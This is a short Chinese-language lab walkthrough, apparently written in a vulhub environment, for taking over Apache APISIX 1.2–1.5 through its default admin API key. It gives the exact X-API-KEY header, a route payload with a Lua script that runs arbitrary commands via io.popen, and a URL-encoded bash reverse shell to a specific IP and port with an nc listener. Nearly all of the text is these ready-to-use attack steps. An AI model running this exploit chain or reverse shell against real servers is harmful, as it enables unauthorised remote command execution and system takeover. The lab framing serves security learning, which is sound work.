一、开启vulhub环境
docker-compose up -d 启动
docker ps 查看开放的端口
漏洞范围
Apache APISIX 1.2~1.5
二、访问靶机IP 9080端口
1、拼接apisix/admin/routes路由
发现其特征为failed to check token
2、抓取当前页面的包,并修改为post请求,添加以下payload
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1 请求头部添加内容{"uri": "/test",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M","upstream": {"type": "roundrobin","nodes": {"example.com:80": 1}}
}
三、获取系统权限
1、此时,我们访问添加成功的恶意路由文件test,可以进行命令执行
2、既然可以执行命令,尝试执行反弹shell语句
bash%20-i%20%3E%26%20/dev/tcp/47.121.133.57/6666%200%3E%261 这里需要url编码3、nc监听6666端口
至此,权限成功拿下。
下期再见,家人们。
